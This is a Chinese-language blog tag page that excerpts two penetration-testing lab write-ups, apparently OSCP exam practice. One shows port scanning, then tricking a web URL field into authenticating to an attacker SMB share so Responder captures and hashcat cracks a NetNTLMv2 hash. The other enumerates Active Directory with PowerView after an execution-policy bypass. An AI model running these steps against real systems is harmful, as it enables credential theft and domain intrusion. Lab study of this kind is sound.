發表文章

目前顯示的是有「SPN」標籤的文章

Challenge 5 - AD

圖片
 Challenge 5 -  AD 先掃對外的機器,└─$ rustscan -a 192.168.230.147 --scripts none --ulimit 5000 | tee rustscan 192.168.230.147 -> [22,21,135,139,445,5040,5985,8000,8080,8443,47001,49664,49665,49667,49666,49668,49669,49670,49671] Port 服務資訊,└─$ sudo nmap -sCV -p 21,22,135,139,445,5040,5985,8000,8080,8443,47001,49664,49665,49667,49666,49668,49669,49670,49671 192.168.230.147 | tee nmap 值得注意的是掃了這麼多靶機,這是第一台有使用憑證的機器,掃描資訊如下 8443/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 | ssl-cert: Subject: commonName=MS01.oscp.exam 可以看到主體名稱是 MS01.oscp.exam,讓我們改一下 HOSTs 連線看一下 https://ms01.oscp.exam:8443 透過 command injection 等 SQL injection 都沒有反應,但當中的 URL 測試時發現慧真的去連線輸入的網址,所以這時候改透過輸入 SMB 網路磁碟機的方式試試看 先在 kali 啟動 responder, sudo responder -I tun0 可以參考這一篇  https://your-it-note.blogspot.com/2023/09/net-ntlmv2.html 送出 kali 主機的不存在路徑 \\192.168.45.232\test 試試看 收到帳號 web_svc 的 NetNTLMv2 的驗證進來了 HASH 存檔後進行破解,└─$ hashcat ...

Active Directory 手動列舉之擴展

圖片
 Active Directory 手動列舉之擴展 列舉作業系統 環境說明 : 在 AD 相關的章節中,主要都是依據下列的 LAB 環境,IP 可能不同,但角色相同 攻擊機 192.168.45.248 靶機   - 192.168.203.70 DC  - 192.168.203.72 web04   - 192.168.203.73 files04  - 192.168.203.74 client74  - 192.168.203.75 client75  - 192.168.203.76 client76 已知一般使用者帳號密碼 stephanie / LegmanTeamBenzoin!! 網域名稱 corp.com 採用工具 PowerView,存放路徑 C:\Tools,匯入指令 Import-Module .\PowerView.ps1 kali 有內建位置在 /usr/share/windows-resources/powersploit/Recon/PowerView.ps1 第一步 RDP 進入到某一台 client,注意密碼因為有驚嘆號,所以要加上單引號 xfreerdp /u:stephanie /p:'LegmanTeamBenzoin!!' /d:corp.com /v:192.168.203.75 匯入 PowerView,記得要先  powershell -ep bypass 獲取網域電腦資訊 Get-NetComputer LAB 很新,DC 都已經是 Windows Server 2022 Standard 版本 之前有提過 Powershell 的輸出可以使用跟資料庫一樣的 select 語法 若要列舉作業系統跟主機名可以使用 Get-NetComputer | select operatingsystem,dnshostname 如下圖列出現有網域的所有電腦作業系統與主機名稱,符合一開始的 LAB 環境定義 練習 1 DistinguishedName for the WEB04 語法 Get-NetComputer | select operatingsystem,dn...